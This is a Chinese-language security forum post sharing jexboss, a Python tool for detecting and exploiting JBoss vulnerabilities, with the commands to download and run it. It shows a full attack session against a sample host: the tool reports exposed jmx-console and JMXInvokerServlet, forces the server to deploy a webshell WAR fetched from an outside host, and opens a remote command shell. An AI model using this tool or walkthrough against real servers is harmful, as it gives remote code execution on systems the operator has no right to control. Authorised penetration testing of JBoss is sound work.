请选择 进入手机版 | 继续访问电脑版
查看: 1449|回复: 0

[工具专区] jexboss – Jboss漏洞检测/利用工具

[复制链接]
  • TA的每日心情
    奋斗
    2018-11-26 14:17
  • 签到天数: 77 天

    [LV.6]常住居民II

    发表于 2016-4-26 10:11:05 | 显示全部楼层 |阅读模式
    jboss的检测我记得好像只有园长的工具 或者使用msf


    下面分享一个py脚本把


    项目地址
    https://github.com/joaomatosf/jexboss



    使用
    [HTML] 纯文本查看 复制代码
    $ git clone https://github.com/joaomatosf/jexboss.git
    $ cd jexboss
    $ python jexboss.py https://site-teste.com
    $ python jexboss.py https://site-teste.com
    * — JexBoss: Jboss verify and EXploitation Tool — *
    | |
    | @author: João Filho Matos Figueiredo |
    | @contact: [email]joaomatosf@gmail.com[/email] |
    | |
    | @update: https://github.com/joaomatosf/jexboss |
    #______________________________________________________#
    ** Checking Host: https://site-teste.com **
    * Checking web-console: [ OK ]
    * Checking jmx-console: [ VULNERABLE ]
    * Checking JMXInvokerServlet: [ VULNERABLE ]
    * Do you want to try to run an automated exploitation via “jmx-console” ?
    This operation will provide a simple command shell to execute commands on the server..
    Continue only if you have permission!
    yes/NO ? yes
    * Sending exploit code to https://site-teste.com. Wait…
    * Info: This exploit will force the server to deploy the webshell
    available on: http://www.joaomatosf.com/rnp/jbossass.war
    * Successfully deployed code! Starting command shell, wait…
    * – – – – – – – – – – – – – – – – – – – – LOL – – – – – – – – – – – – – – – – – – – – *
    * https://site-teste.com:
    Linux seglinux 3.18.4-1.el6.elrepo.x86_64 #1 SMP Wed Jan 28 13:28:52 EST 2015 x86_64 x86_64 x86_64 GNU/Linux
    CentOS release 6.5 (Final)
    uid=509(jboss) gid=509(jboss) grupos=509(jboss) context=system_u:system_r:initrc_t:s0
    [Type commands or “exit” to finish]
    Shell> pwd
    /usr/jboss-6.1.0.Final/bin
    回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    快速回复 返回顶部 返回列表